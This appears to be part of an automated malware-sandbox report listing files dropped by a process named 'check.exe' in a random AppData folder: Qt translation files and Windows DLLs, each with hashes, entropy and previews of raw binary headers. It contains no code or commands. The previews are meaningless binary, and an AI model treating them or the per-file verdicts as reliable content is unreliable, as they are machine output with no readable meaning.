                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):158274
                                                                                                                                                                                                            Entropy (8bit):5.402056706327934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                            MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                            SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                            SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                            SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):127849
                                                                                                                                                                                                            Entropy (8bit):5.83455389078597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                            MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                            SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                            SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                            SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2483712
                                                                                                                                                                                                            Entropy (8bit):6.241719144701645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                            MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                            SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                            SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                            SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2494976
                                                                                                                                                                                                            Entropy (8bit):6.232020603277999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                            MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                            SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                            SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                            SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5144576
                                                                                                                                                                                                            Entropy (8bit):6.262739223310643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                            MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                            SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                            SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                            SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120320
                                                                                                                                                                                                            Entropy (8bit):6.034057886020456
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                            MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                            SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                            SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                            SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49744
                                                                                                                                                                                                            Entropy (8bit):6.701724666218339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                            MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                            SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                            SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                            SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):84240
                                                                                                                                                                                                            Entropy (8bit):6.607563436050078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                            MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                            SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                            SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                            SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131344
                                                                                                                                                                                                            Entropy (8bit):6.311142284249784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                            MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                            SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                            SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                            SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):277776
                                                                                                                                                                                                            Entropy (8bit):6.5855511991551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                            MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                            SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                            SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                            SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                            Entropy (8bit):6.220967684620152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                            MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                            SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                            SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                            SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157968
                                                                                                                                                                                                            Entropy (8bit):6.854644275249963
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                            MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                            SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                            SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                            SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33552
                                                                                                                                                                                                            Entropy (8bit):6.446391764486538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                            MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                            SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                            SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                            SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83728
                                                                                                                                                                                                            Entropy (8bit):6.331814573029388
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                            MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                            SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                            SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                            SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181520
                                                                                                                                                                                                            Entropy (8bit):5.972827303352998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                            MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                            SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                            SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                            SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38160
                                                                                                                                                                                                            Entropy (8bit):6.338856805460127
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                            MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                            SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                            SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                            SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
